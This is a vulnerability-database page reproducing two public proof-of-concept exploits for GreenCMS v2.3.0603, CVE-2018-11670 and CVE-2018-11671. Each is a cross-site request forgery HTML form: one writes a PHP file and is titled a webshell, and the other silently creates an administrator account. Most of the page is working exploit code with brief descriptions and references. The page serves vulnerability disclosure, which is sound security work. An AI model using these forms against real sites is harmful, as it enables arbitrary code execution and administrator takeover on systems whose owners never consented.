Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

GreenCMS 2.3.0603 Cross Site Request Forgery

Related Vulnerabilities: CVE-2018-11670   CVE-2018-11671  
Publish Date: 03 Jun 2018
Author: xichao
Source 
                Exploit 1 of 2:

# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
# Software Link: https://github.com/GreenCMS/GreenCMS
# Version: v2.3.0603
# CVE : CVE-2018-11670
  
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
 
poc:
 
<span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
<head> 
    <meta charset="UTF-8"> 
    <title>csrftest</title> 
</head> 
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
    <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
    <input type="hidden" name="cmd" value="put">
    <input type="hidden" name="target" value="l1_eGMucGhw">
a    <input type="hidden" name="content" value="<?php phpinfo();?>">
    <button type="submit" value="Submit">WebShell</button>
    </form>
    </body>
</html></span>
 
References:
http://www.iwantacve.cn/index.php/archives/38/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
https://github.com/GreenCMS/GreenCMS/issues/108

----------------
Exploit 2 of 2:

# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin
# Date: 2018-06-02
# Exploit Author: xichao
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
# Software Link: https://github.com/GreenCMS/GreenCMS
# Version: v2.3.0603
# CVE : CVE-2018-11671
  
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.
 
poc:
 
<span style="font-size:18px;"><!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>csrftest</title>  
</head>  
aa<body>  
    aaaa<form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">  
aaaaaaaa<input type="hidden" name="user_id0" value="1">  
aaaaaaaa<input type="hidden" name="user_login" value="test1">
aaaaaaaa<input type="hidden" name="password" value="test1">  
aaaaaaaa<input type="hidden" name="rpassword" value="test1">  
aaaaaaaa<input type="hidden" name="user_nicename" value="123">  
aaaaaaaa<input type="hidden" name="user_email" value="123%40Qq.com">  
aaaaaaaa<input type="hidden" name="user_url" value="www.baidu.com">  
aaaaaaaa<input type="hidden" name="user_intro" value="test">  
aaaaaaaa<input type="hidden" name="user_status" value="1">  
aaaaaaaa<input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">add admin</button>  
aaaaaa</form>  
    </body>
</html></span>
 
References:
http://www.iwantacve.cn/index.php/archives/39/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
https://github.com/GreenCMS/GreenCMS/issues/109

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started